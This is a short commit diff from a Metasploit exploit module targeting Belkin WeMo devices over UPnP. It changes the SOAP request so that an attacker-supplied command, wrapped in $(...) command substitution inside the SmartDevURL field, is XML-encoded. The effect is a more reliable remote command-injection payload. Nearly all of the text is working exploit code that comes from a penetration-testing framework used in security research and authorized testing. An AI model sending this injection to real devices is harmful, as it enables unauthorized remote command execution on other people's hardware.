Properly encode command input with XML entities

REXML would make this less ghetto.

modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb

@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Exploit::Remote
       <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <s:Body>
           <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
-            <SmartDevURL>$(#{cmd})</SmartDevURL>
+            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
           </u:SetSmartDevInfo>
         </s:Body>
       </s:Envelope>